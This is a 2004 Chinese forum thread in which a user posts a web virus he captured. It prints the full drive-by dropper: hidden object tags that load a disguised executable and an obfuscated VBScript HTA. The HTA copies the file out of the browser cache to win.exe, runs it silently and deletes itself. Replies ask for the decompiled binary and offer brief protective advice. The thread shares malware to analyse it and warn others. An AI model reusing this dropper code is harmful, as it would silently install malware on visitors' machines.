我截获的一个网页病毒。我打上了win2000所有的补丁，还进来了。(100分)

lt66 · 2004-03-13

主页中包含一个指向 mm[1].htm
mm[1].htm内容：
<html>
<body>
<object data="lhxyexe.asp" weight=0 width= 0></object>
<object data="lhxyhta.asp" weight=0 width= 0></object>
</body>
</html>
其中
lhxyexe.asp=lhxyexe.asp.gif 病毒的exe文件已经upx压缩。
lhxyhta.asp是一个脚本文件
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<HTA:APPLICATION caption="no" border="none" windowState="minimize" >
<script LaNGUAGE="VBScript">
Set g_fs = CreateObject("Scripting.FileSystemObject")
Set tf = g_fs.CreateTextFile("c:/win.hta",true)
tf.write "<HTA:APPLICATION caption=" &
CHR(34)&
"no" &
CHR(34)&
" border=" &
CHR(34)&
"none" &
CHR(34)&
" showintaskbar=" &
CHR(34)&
"no" &
CHR(34)&
" >" &chr(13)&chr(10)
tf.write "<object id='wsh' cl"&
chr(97)&"ssid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"&chr(13)&chr(10)
tf.write "<" &
"script LANGUAGE=" &
CHR(34)&
"VBScript" &
CHR(34)&
">"&chr(13)&chr(10)
tf.write "on error resume next"&chr(13)&chr(10)
tf.write "window.moveTo 0,0"&chr(13)&chr(10)
tf.write "window.resizeTo 0,0 "&chr(13)&chr(10)
tf.write "dim exepath"&chr(13)&chr(10)
tf.write "Function Search(objFolder) "&chr(13)&chr(10)
tf.write "Dim objSubFolder"&chr(13)&chr(10)
tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10)
tf.write "If InStr(1, objfile.name, " &
CHR(34)&
"lhxyexe" &
CHR(34)&
", vbtextcompare) then
"&chr(13)&chr(10)
tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10)
tf.write "filecp.copy (exepath)"&chr(13)&chr(10)
tf.write "exit for"&chr(13)&chr(10)
tf.write "End If"&chr(13)&chr(10)
tf.write "Next "&chr(13)&chr(10)
tf.write "For Each objSubFolder in objFolder.SubFolders "&chr(13)&chr(10)
tf.write "Search objSubFolder"&chr(13)&chr(10)
tf.write "Next"&chr(13)&chr(10)
tf.write "End Function"&chr(13)&chr(10)
tf.write "Set objg_fso = CreateObject(" &
CHR(34)&
"Scripting.FileSystemObject" &
CHR(34)&
")"&chr(13)&chr(10)
tf.write "str=WSH.regread(" &
CHR(34)&
"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders/cache" &
CHR(34)&
")"&chr(13)&chr(10)
tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10)
tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10)
tf.write "exepath=othisfolder.path &
"&
chr(34) &
"win.exe" &
chr(34) &chr(13)&chr(10)
tf.write "search tempfolder"&chr(13)&chr(10)
tf.write "wsh.run (exepath)"&chr(13)&chr(10)
tf.write "wsh.run " &
CHR(34)&
"command.com /c del c:/win.hta" &
CHR(34)&
" ,0"&chr(13)&chr(10)
tf.write "window.close()"&chr(13)&chr(10)
tf.write "<" &chr(47)&
"script>"&chr(13)&chr(10)
tf.close
wsh.run "c:/win.hta",0
window.close ()
</script>
asp的漏洞太大了。

lt66 · 2004-03-13

有兴趣的可以向我索要 <我反编译的 LHXYEXE.asp.gif> lt66@21cn.com

刘麻子 · 2004-03-13

你是好样的！

firstrose · 2004-03-24

这有什么。disable js/java applet/active x就可以拉。

thsgongsi · 2004-04-02

不错　我也要一份。

xizhousheng · 2004-04-02

xizhousheng@sina.com
3x

loginfree · 2004-04-16

垃圾病毒而已，看它的代码也是从EXETOBMP的源代码中借鉴而来的，一点也不新鲜。
见议怕中毒的朋友，用正版的杀毒软件，每周至少升级一次病毒库。不过，这不是万全之策，最重要的是，不要浏览陌生和不知名的网站，以保护自己爱机和数据的安全。

lt66 · 2004-04-18

我只是感觉他的传染方式不错。

晨晨 · 2004-05-12

不明白，能讲一下原理么？楼主大侠？

我截获的一个网页病毒。我打上了win2000所有的补丁，还进来了。(100分)

lt66

Unregistered / Unconfirmed

lt66

Unregistered / Unconfirmed

刘麻子

Unregistered / Unconfirmed

firstrose

Unregistered / Unconfirmed

thsgongsi

Unregistered / Unconfirmed

xizhousheng

Unregistered / Unconfirmed

loginfree

Unregistered / Unconfirmed

lt66

Unregistered / Unconfirmed

晨晨

Unregistered / Unconfirmed

Similar threads